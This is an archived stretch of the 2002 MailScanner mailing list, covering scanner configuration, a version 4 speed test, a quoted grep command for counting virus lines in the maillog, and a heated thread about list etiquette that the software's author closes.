<5.1.0.14.2.20020912155536.04fd9520@imap.ecs.soton.ac.uk> At 15:22 12/09/2002, you wrote: >Excellent! Was that also hooked up to Spam Assassin, or running by itself? Here are all the relevant settings: - Message batch size 100 messages max - Expand TNEF - Scanning with Sophos - Standard set of filename rules - Deliver cleaned messages - Do all subject-line modifications - Notify senders - Using ORDB-RBL, Infinite-Monkeys, MAPS-RBL+ spam blacklists - Using SpamAssassin with a max message size of 50,000 bytes - Delivering in Background - Delivery method = queue -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From Matthew_doherty at DATAWATCH.COM Thu Sep 12 16:02:38 2002 From: Matthew_doherty at DATAWATCH.COM (Matt Doherty) Date: Thu Jan 12 21:15:35 2006 Subject: what are you rude?.. heres a copy of what I sent you a week ago.try reading it Message-ID: MessageYeah, So do I. I think the people of this list deserve to know what he added from their suggestions. Don't you think? If your standing in line to get in a concert, arn't you wondering if your going to get in - in time to not miss the beginning of a show. Dont talk to me about money - I have done over 170,000 dollars of work for nothing over 5 years and I am still polite to the people I do it for. That doesn't matter anyways. I asked a question politely towards this list probably 17 times and only got 15 of them answered.. Meanwhile off the subject questions get answered. But I'm not rude about it either. I think the people in this list deserve a better respons than that. I think we all wanted to know what he considered and what he didn't. Otherwise we may think twice about answering him next time. I spent 10 minutes trying to think of some good suggestions only to get a response stating "SUch As"? I STATED 2 SUCH AS examples. That shows me how carefully read these posts are in here. The public helped get this program where it is today. Dont get an ego over it. Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Steve Evans [mailto:sevans@FOUNDATION.SDSU.EDU] Sent: Thursday, September 12, 2002 11:50 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: what are you rude?.. heres a copy of what I sent you a week ago.try reading it Normally I leave arrogant posts like this alone, because I find it's a waste of time to teach people manners in a forum like this. But . . . If you want someone to complain to, yell at, rip apart, be rude to, etc I've included a list of commercial anti-virus companies that will gladly put up with that for a few thousand+ dollars. http://www.nai.com/ http://www.trendmicro.com/ http://www.sophos.com/ Meanwhile if you plan on staying on this list, most of us don't like to see Julian assaulted with attitudes like this. He's saving me in the neighborhood of $20,000, and that's not even counting the reduced labor I have to spend on his product compared to the big boy's products, and I come from a small shop. I can't imagine what he's saving other people in money. And here's the kicker, he works for FREE. Steve Evans (619) 594-0653 -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] Sent: Thursday, September 12, 2002 7:40 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: what are you rude?.. heres a copy of what I sent you a week ago. try reading it such as Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] Sent: Monday, September 09, 2002 4:34 PM To: MailScanner mailing list Subject: RE: New release logging suggestions I would like to see some differant text in the log per email virus caught.. I grep the maillog to see how many viruses caught so far that week. For instance, I currently tried 'tail -2000 /var/log/maillog | grep >>>Virus' of course the ">" symbols something that messes grep up and wont work. The only string that works best is just use the word Virus ( tail -2000 /var/log/maillog | grep Virus ) Only thing is, it shows the mailscanner restarting every four hours lines as well as the viruses caught. I cant think of anything good but maybe some weird character that is never seen in the maillog such as a & or pipe symbol? Just something that grep could sniff out easily ONLY for caught viruses. Or do you have a better solution? The Email ID to go along with it as well would be nice. for ones that were scanned and ones that were found to be infected. Hope that is a ok suggestion.. Oh well Im still a newbie anyways 8-) Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Monday, September 09, 2002 5:14 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: New release logging suggestions The new release is getting there... What logging would people like to see? Anything particular that you want logged? Suggestions please. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/536bc530/attachment.html From sevans at FOUNDATION.SDSU.EDU Thu Sep 12 16:12:19 2002 From: sevans at FOUNDATION.SDSU.EDU (Steve Evans) Date: Thu Jan 12 21:15:35 2006 Subject: what are you rude?.. heres a copy of what I sent you a week ago.try reading it Message-ID: <6214C3F9233D764C9E7029396C355015331493@mail.foundation.sdsu.edu> 1 vote to ban him from the list. Steve Evans (619) 594-0653 -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] Sent: Thursday, September 12, 2002 8:03 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: what are you rude?.. heres a copy of what I sent you a week ago.try reading it Yeah, So do I. I think the people of this list deserve to know what he added from their suggestions. Don't you think? If your standing in line to get in a concert, arn't you wondering if your going to get in - in time to not miss the beginning of a show. Dont talk to me about money - I have done over 170,000 dollars of work for nothing over 5 years and I am still polite to the people I do it for. That doesn't matter anyways. I asked a question politely towards this list probably 17 times and only got 15 of them answered.. Meanwhile off the subject questions get answered. But I'm not rude about it either. I think the people in this list deserve a better respons than that. I think we all wanted to know what he considered and what he didn't. Otherwise we may think twice about answering him next time. I spent 10 minutes trying to think of some good suggestions only to get a response stating "SUch As"? I STATED 2 SUCH AS examples. That shows me how carefully read these posts are in here. The public helped get this program where it is today. Dont get an ego over it. Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Steve Evans [mailto:sevans@FOUNDATION.SDSU.EDU] Sent: Thursday, September 12, 2002 11:50 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: what are you rude?.. heres a copy of what I sent you a week ago.try reading it Normally I leave arrogant posts like this alone, because I find it's a waste of time to teach people manners in a forum like this. But . . . If you want someone to complain to, yell at, rip apart, be rude to, etc I've included a list of commercial anti-virus companies that will gladly put up with that for a few thousand+ dollars. http://www.nai.com/ http://www.trendmicro.com/ http://www.sophos.com/ Meanwhile if you plan on staying on this list, most of us don't like to see Julian assaulted with attitudes like this. He's saving me in the neighborhood of $20,000, and that's not even counting the reduced labor I have to spend on his product compared to the big boy's products, and I come from a small shop. I can't imagine what he's saving other people in money. And here's the kicker, he works for FREE. Steve Evans (619) 594-0653 -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] Sent: Thursday, September 12, 2002 7:40 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: what are you rude?.. heres a copy of what I sent you a week ago. try reading it such as Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] Sent: Monday, September 09, 2002 4:34 PM To: MailScanner mailing list Subject: RE: New release logging suggestions I would like to see some differant text in the log per email virus caught.. I grep the maillog to see how many viruses caught so far that week. For instance, I currently tried 'tail -2000 /var/log/maillog | grep >>>Virus' of course the ">" symbols something that messes grep up and wont work. The only string that works best is just use the word Virus ( tail -2000 /var/log/maillog | grep Virus ) Only thing is, it shows the mailscanner restarting every four hours lines as well as the viruses caught. I cant think of anything good but maybe some weird character that is never seen in the maillog such as a & or pipe symbol? Just something that grep could sniff out easily ONLY for caught viruses. Or do you have a better solution? The Email ID to go along with it as well would be nice. for ones that were scanned and ones that were found to be infected. Hope that is a ok suggestion.. Oh well Im still a newbie anyways 8-) Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Monday, September 09, 2002 5:14 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: New release logging suggestions The new release is getting there... What logging would people like to see? Anything particular that you want logged? Suggestions please. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/2f90602b/attachment.html From mailscanner at ecs.soton.ac.uk Thu Sep 12 16:01:58 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:35 2006 Subject: First speed test of version 4 In-Reply-To: <6214C3F9233D764C9E7029396C355015331490@mail.foundation.sds u.edu> Message-ID: <5.1.0.14.2.20020912160127.04f3d7f0@imap.ecs.soton.ac.uk> At 15:36 12/09/2002, you wrote: >This is worse than Christmas. I'm sorry, please feel free to post me all your CPU's, that should slow things down a bit. ;-) >Steve Evans >(619) 594-0653 > >-----Original Message----- >From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] >Sent: Thursday, September 12, 2002 7:26 AM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: Re: First speed test of version 4 > > >At 15:13 12/09/2002, you wrote: > >Hi! > > > > > Version 3 processed 20,000 messages in 415.5 minutes. > > > This scales up to 69314 messages per day. > > > > > > Version 4 processes 20,000 messages in 130.3 minutes. > > > This scales up to 221028 messages per day. > > > > > > So version 4 ran 3.2 times faster than version 3 on the same > > > hardware, with the same MailScanner configuration, with the same > > > 20,000 messages. > > > >Any public beta's available ? :)) > >Not quite yet. I've got quite a bit of testing that I want to do on it >first, before I let you guys have a play. >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From S.R.Patterson at soton.ac.uk Thu Sep 12 16:20:02 2002 From: S.R.Patterson at soton.ac.uk (Patterson S.R.) Date: Thu Jan 12 21:15:35 2006 Subject: what are you rude?.. heres a copy of what I sent you a week a go. try reading it Message-ID: Your answer is: grep '>>> Virus' maillog Note the single quotes. They stop the ">" characters from having a meaning to the shell. Make sure you use the ones which slope from bottom-left to top-right (or look straight upright), NOT the ones which slope top-left to bottom-right, as they do something completely different. This is a UNIX question, not a mailscanner question. -- Steven Patterson MSci. Tel: +44 (0)2380 595810 Electronic Information Systems Support and Development Computing Services, University of Southampton, UK. Public PGP Key: http://www.soton.ac.uk/~srp/pubkey.asc -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] Sent: 12 September 2002 15:40 To: MAILSCANNER@JISCMAIL.AC.UK Subject: what are you rude?.. heres a copy of what I sent you a week ago. try reading it such as Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] Sent: Monday, September 09, 2002 4:34 PM To: MailScanner mailing list Subject: RE: New release logging suggestions I would like to see some differant text in the log per email virus caught.. I grep the maillog to see how many viruses caught so far that week. For instance, I currently tried 'tail -2000 /var/log/maillog | grep >>>Virus' of course the ">" symbols something that messes grep up and wont work. The only string that works best is just use the word Virus ( tail -2000 /var/log/maillog | grep Virus ) Only thing is, it shows the mailscanner restarting every four hours lines as well as the viruses caught. I cant think of anything good but maybe some weird character that is never seen in the maillog such as a & or pipe symbol? Just something that grep could sniff out easily ONLY for caught viruses. Or do you have a better solution? The Email ID to go along with it as well would be nice. for ones that were scanned and ones that were found to be infected. Hope that is a ok suggestion.. Oh well Im still a newbie anyways 8-) Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Monday, September 09, 2002 5:14 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: New release logging suggestions The new release is getting there... What logging would people like to see? Anything particular that you want logged? Suggestions please. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/91b0a7ad/attachment.html From Denis.Beauchemin at USHERBROOKE.CA Thu Sep 12 16:26:39 2002 From: Denis.Beauchemin at USHERBROOKE.CA (Denis Beauchemin) Date: Thu Jan 12 21:15:35 2006 Subject: what are you rude?.. heres a copy of what I sent you a week ago.try reading it In-Reply-To: <6214C3F9233D764C9E7029396C355015331493@mail.foundation.sdsu.edu> References: <6214C3F9233D764C9E7029396C355015331493@mail.foundation.sdsu.edu> Message-ID: <1031844399.15425.15.camel@dbeauchemin.si.usherb.ca> On Thu, 2002-09-12 at 11:12, Steve Evans wrote: > 1 vote to ban him from the list. > > -----Original Message----- > From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] I agree with Steve. Denis -- Denis Beauchemin, analyste Universit? de Sherbrooke, S.T.I. T: 819.821.8000x2252 F: 819.821.8045 From mike at CAMAROSS.NET Wed Sep 11 16:37:48 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:35 2006 Subject: MRTG Revisited In-Reply-To: <37016.10.0.0.5.1034169923.squirrel@webmail.dvere.dyndns.org> Message-ID: Thanks to everyone that shared their different mrtg configs! Has anyone been able to extract the names and occurrences of the different virus variants for graphing purposes? Mike From mike at CAMAROSS.NET Thu Sep 12 04:39:33 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:35 2006 Subject: V4 Oddity in ruleset In-Reply-To: <5.1.0.14.2.20021010005252.024daa28@imap.ecs.soton.ac.uk> Message-ID: I have a ruleset for converting HTML to text. Part of it is below... The problem is if kris@domain1.org send an HTML email to himself@domain1.org AND mike@domain1.org (cc), both recipients get a convert to text email. If kris@domain1.org sends an HTML email to kris@domain2.org AND mike@domain1.org, Kris gets the HTML version and Mike gets the text version. Did I miss something? FromTo: default no FromTo: kris@* no #added just as a test FromTo: mike@domain1.org yes From tal at MUSICGENOME.COM Thu Sep 12 16:35:57 2002 From: tal at MUSICGENOME.COM (Tal Kelrich) Date: Thu Jan 12 21:15:35 2006 Subject: [Fwd: Bypassing SMTP Content Protection with a Flick of a Button] Message-ID: <1031844957.27823.9.camel@johnny5> Skipped content of type multipart/mixed-------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: This is a digitally signed message part Url : http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/ebcd9ed5/attachment.bin From tal at MUSICGENOME.COM Thu Sep 12 16:39:34 2002 From: tal at MUSICGENOME.COM (Tal Kelrich) Date: Thu Jan 12 21:15:36 2006 Subject: [Fwd: MIMEDefang update (was Re: Bypassing SMTP Content Protection )] Message-ID: <1031845174.27821.12.camel@johnny5> Skipped content of type multipart/mixed-------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: This is a digitally signed message part Url : http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/be23c3a7/attachment.bin From Matthew_Doherty at DATAWATCH.COM Thu Sep 12 16:41:28 2002 From: Matthew_Doherty at DATAWATCH.COM (Matt Doherty) Date: Thu Jan 12 21:15:36 2006 Subject: what are you rude?.. heres a copy of what I sent you a week a go.try reading it Message-ID: MessageThanks for pointing that out for me. Pete Peters answered me the same tip 3 days ago. >>> Virus' line in the UNIX Maillog comes from Mailscanner. Thats why I asked it as a MailScanner issue and not UNIX. After all it is in the mailscanner code to add '>>>Virus' in the UNIX SEndmail Log File. Not UNIX Itself right? Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Patterson S.R. [mailto:S.R.Patterson@SOTON.AC.UK] Sent: Thursday, September 12, 2002 12:20 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: what are you rude?.. heres a copy of what I sent you a week a go.try reading it Your answer is: grep '>>> Virus' maillog Note the single quotes. They stop the ">" characters from having a meaning to the shell. Make sure you use the ones which slope from bottom-left to top-right (or look straight upright), NOT the ones which slope top-left to bottom-right, as they do something completely different. This is a UNIX question, not a mailscanner question. -- Steven Patterson MSci. Tel: +44 (0)2380 595810 Electronic Information Systems Support and Development Computing Services, University of Southampton, UK. Public PGP Key: http://www.soton.ac.uk/~srp/pubkey.asc -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] Sent: 12 September 2002 15:40 To: MAILSCANNER@JISCMAIL.AC.UK Subject: what are you rude?.. heres a copy of what I sent you a week ago. try reading it such as Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] Sent: Monday, September 09, 2002 4:34 PM To: MailScanner mailing list Subject: RE: New release logging suggestions I would like to see some differant text in the log per email virus caught.. I grep the maillog to see how many viruses caught so far that week. For instance, I currently tried 'tail -2000 /var/log/maillog | grep >>>Virus' of course the ">" symbols something that messes grep up and wont work. The only string that works best is just use the word Virus ( tail -2000 /var/log/maillog | grep Virus ) Only thing is, it shows the mailscanner restarting every four hours lines as well as the viruses caught. I cant think of anything good but maybe some weird character that is never seen in the maillog such as a & or pipe symbol? Just something that grep could sniff out easily ONLY for caught viruses. Or do you have a better solution? The Email ID to go along with it as well would be nice. for ones that were scanned and ones that were found to be infected. Hope that is a ok suggestion.. Oh well Im still a newbie anyways 8-) Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Monday, September 09, 2002 5:14 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: New release logging suggestions The new release is getting there... What logging would people like to see? Anything particular that you want logged? Suggestions please. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/24c07315/attachment.html From dustin.baer at IHS.COM Thu Sep 12 16:48:22 2002 From: dustin.baer at IHS.COM (Dustin Baer) Date: Thu Jan 12 21:15:36 2006 Subject: what are you rude?.. heres a copy of what I sent you a week ago.try reading it References: Message-ID: <3D80B746.7BD3FFEF@ihs.com> > >>> Virus' line in the UNIX Maillog comes from Mailscanner Uhhh...No, I believe it comes from Sophos. -- Dustin Baer Unix Administrator/Postmaster Information Handling Services 15 Inverness Way East Englewood, CO 80112 303-397-2836 From gerry at DORFAM.CA Thu Sep 12 16:51:22 2002 From: gerry at DORFAM.CA (Gerry Doris) Date: Thu Jan 12 21:15:36 2006 Subject: what are you rude?.. heres a copy of what I sent you a weekago.try reading it Message-ID: MessageI agree with Matt! I want to know if I'm being heard as well! Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] Sent: Thursday, September 12, 2002 12:04 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: what are you rude?.. heres a copy of what I sent you a weekago.try reading it Yeah, So do I. I think the people of this list deserve to know what he added from their suggestions. Don't you think? If your standing in line to get in a concert, arn't you wondering if your going to get in - in time to not miss the beginning of a show. Dont talk to me about money - I have done over 170,000 dollars of work for nothing over 5 years and I am still polite to the people I do it for. That doesn't matter anyways. I asked a question politely towards this list probably 17 times and only got 15 of them answered.. Meanwhile off the subject questions get answered. But I'm not rude about it either. I think the people in this list deserve a better respons than that. I think we all wanted to know what he considered and what he didn't. Otherwise we may think twice about answering him next time. I spent 10 minutes trying to think of some good suggestions only to get a response stating "SUch As"? I STATED 2 SUCH AS examples. That shows me how carefully read these posts are in here. The public helped get this program where it is today. Dont get an ego over it. Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Steve Evans [mailto:sevans@FOUNDATION.SDSU.EDU] Sent: Thursday, September 12, 2002 11:50 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: what are you rude?.. heres a copy of what I sent you a week ago.try reading it Normally I leave arrogant posts like this alone, because I find it's a waste of time to teach people manners in a forum like this. But . . . If you want someone to complain to, yell at, rip apart, be rude to, etc I've included a list of commercial anti-virus companies that will gladly put up with that for a few thousand+ dollars. http://www.nai.com/ http://www.trendmicro.com/ http://www.sophos.com/ Meanwhile if you plan on staying on this list, most of us don't like to see Julian assaulted with attitudes like this. He's saving me in the neighborhood of $20,000, and that's not even counting the reduced labor I have to spend on his product compared to the big boy's products, and I come from a small shop. I can't imagine what he's saving other people in money. And here's the kicker, he works for FREE. Steve Evans (619) 594-0653 -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] Sent: Thursday, September 12, 2002 7:40 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: what are you rude?.. heres a copy of what I sent you a week ago. try reading it such as Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] Sent: Monday, September 09, 2002 4:34 PM To: MailScanner mailing list Subject: RE: New release logging suggestions I would like to see some differant text in the log per email virus caught.. I grep the maillog to see how many viruses caught so far that week. For instance, I currently tried 'tail -2000 /var/log/maillog | grep >>>Virus' of course the ">" symbols something that messes grep up and wont work. The only string that works best is just use the word Virus ( tail -2000 /var/log/maillog | grep Virus ) Only thing is, it shows the mailscanner restarting every four hours lines as well as the viruses caught. I cant think of anything good but maybe some weird character that is never seen in the maillog such as a & or pipe symbol? Just something that grep could sniff out easily ONLY for caught viruses. Or do you have a better solution? The Email ID to go along with it as well would be nice. for ones that were scanned and ones that were found to be infected. Hope that is a ok suggestion.. Oh well Im still a newbie anyways 8-) Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Monday, September 09, 2002 5:14 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: New release logging suggestions The new release is getting there... What logging would people like to see? Anything particular that you want logged? Suggestions please. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/544d7b46/attachment.html From jkf at ecs.soton.ac.uk Thu Sep 12 16:50:55 2002 From: jkf at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:36 2006 Subject: what are you rude?.. heres a copy of what I sent you a week a go.try reading it In-Reply-To: Message-ID: <5.1.0.14.2.20020912165042.04a87170@imap.ecs.soton.ac.uk> At 16:41 12/09/2002, you wrote: >Thanks for pointing that out for me. Pete Peters answered me the same tip >3 days ago. > >>> Virus' line in the UNIX Maillog comes from Mailscanner. Thats why I > asked it as a MailScanner issue and not UNIX. After all it is in the > mailscanner code to add '>>>Virus' in the UNIX SEndmail Log File. Not > UNIX Itself right? Neither. It's in the output from the virus scanner engine. > > > >Matt Doherty >IT Dept >Datawatch Corp > > >>In a world without walls or fences, who needs Windows and Gates?<< >-----Original Message----- >From: Patterson S.R. [mailto:S.R.Patterson@SOTON.AC.UK] >Sent: Thursday, September 12, 2002 12:20 PM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: Re: what are you rude?.. heres a copy of what I sent you a week a >go.try reading it > >Your answer is: > >grep '>>> Virus' maillog > >Note the single quotes. They stop the ">" characters from having a >meaning to the shell. Make sure you use the ones which slope from >bottom-left to top-right (or look straight upright), NOT the ones which >slope top-left to bottom-right, as they do something completely different. > >This is a UNIX question, not a mailscanner question. > >-- >Steven Patterson MSci. Tel: +44 (0)2380 595810 >Electronic Information Systems Support and Development >Computing Services, University of Southampton, UK. >Public PGP Key: >http://www.soton.ac.uk/~srp/pubkey.asc > >-----Original Message----- >From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] >Sent: 12 September 2002 15:40 >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: what are you rude?.. heres a copy of what I sent you a week ago. >try reading it > >such as > > > >Matt Doherty >IT Dept >Datawatch Corp > > >>In a world without walls or fences, who needs Windows and Gates?<< >-----Original Message----- >From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] >Sent: Monday, September 09, 2002 4:34 PM >To: MailScanner mailing list >Subject: RE: New release logging suggestions > >I would like to see some differant text in the log per email virus >caught.. I grep the maillog to see how many viruses caught so far that >week. For instance, I currently tried 'tail -2000 /var/log/maillog | >grep >>>Virus' of course the ">" symbols something that messes grep up and >wont work. The only string that works best is just use the word Virus ( >tail -2000 /var/log/maillog | grep Virus ) Only thing is, it shows the >mailscanner restarting every four hours lines as well as the viruses >caught. I cant think of anything good but maybe some weird character that >is never seen in the maillog such as a & or pipe symbol? Just something >that grep could sniff out easily ONLY for caught viruses. Or do you have a >better solution? The Email ID to go along with it as well would be nice. >for ones that were scanned and ones that were found to be infected. >Hope that is a ok suggestion.. >Oh well Im still a newbie anyways 8-) > > >Matt Doherty >IT Dept >Datawatch Corp > > >>In a world without walls or fences, who needs Windows and Gates?<< >-----Original Message----- >From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] >Sent: Monday, September 09, 2002 5:14 PM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: New release logging suggestions > >The new release is getting there... > >What logging would people like to see? >Anything particular that you want logged? > >Suggestions please. >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton >Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/0d2f4759/attachment.html From Matthew_Doherty at DATAWATCH.COM Thu Sep 12 16:53:55 2002 From: Matthew_Doherty at DATAWATCH.COM (Matt Doherty) Date: Thu Jan 12 21:15:36 2006 Subject: >>> Virus in the UNIX Maillog comes from Sophos Message-ID: Oh, Sorry, my bad. Thank you Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Dustin Baer [mailto:dustin.baer@IHS.COM] Sent: Thursday, September 12, 2002 12:49 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: what are you rude?.. heres a copy of what I sent you a weekago.try reading it > >>> Virus' line in the UNIX Maillog comes from Mailscanner Uhhh...No, I believe it comes from Sophos. -- Dustin Baer Unix Administrator/Postmaster Information Handling Services 15 Inverness Way East Englewood, CO 80112 303-397-2836 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/ea989a4f/attachment.html From mailscanner at ecs.soton.ac.uk Thu Sep 12 16:57:00 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:36 2006 Subject: what are you rude?.. heres a copy of what I sent you a week ago.try reading it In-Reply-To: <1031844399.15425.15.camel@dbeauchemin.si.usherb.ca> References: <6214C3F9233D764C9E7029396C355015331493@mail.foundation.sdsu.edu> <6214C3F9233D764C9E7029396C355015331493@mail.foundation.sdsu.edu> Message-ID: <5.1.0.14.2.20020912165107.04b846c0@imap.ecs.soton.ac.uk> Please can we just drop this thread altogether? Unless there's a very good reason, banning someone from the list is a pretty puerile thing to do and I don't want to sink to his level. If he believes that a voluntary mailing list is the same as a premium rate tech support phone number, maybe he might like to send me $20,000 per year, at which point he can have my phone number. Pay me (and other regular contributors on the list) a large enough sum of money and I'm sure we could provide the level of support he seems to want. At some point he will come to realise that expecting any more than you pay for involves being patient, tolerant and polite. Most people realise this eventually. I hereby announce this thread to be dead. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From Matthew_Doherty at DATAWATCH.COM Thu Sep 12 17:15:52 2002 From: Matthew_Doherty at DATAWATCH.COM (Matt Doherty) Date: Thu Jan 12 21:15:36 2006 Subject: what are you rude?.. heres a copy of what I sent you a weekago.try reading it Message-ID: Famous economic principle The demand for a free good always exceeds supply. Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Thursday, September 12, 2002 1:00 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: what are you rude?.. heres a copy of what I sent you a weekago.try reading it Please can we just drop this thread altogether? Unless there's a very good reason, banning someone from the list is a pretty puerile thing to do and I don't want to sink to his level. If he believes that a voluntary mailing list is the same as a premium rate tech support phone number, maybe he might like to send me $20,000 per year, at which point he can have my phone number. Pay me (and other regular contributors on the list) a large enough sum of money and I'm sure we could provide the level of support he seems to want. At some point he will come to realise that expecting any more than you pay for involves being patient, tolerant and polite. Most people realise this eventually. I hereby announce this thread to be dead. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/1402409e/attachment.html From steinkel at PA.NET Thu Sep 12 17:39:35 2002 From: steinkel at PA.NET (Leland J. Steinke) Date: Thu Jan 12 21:15:36 2006 Subject: Postfix support. References: <20020912111851.5af6cee8.marc.perea@electronic-group.com> 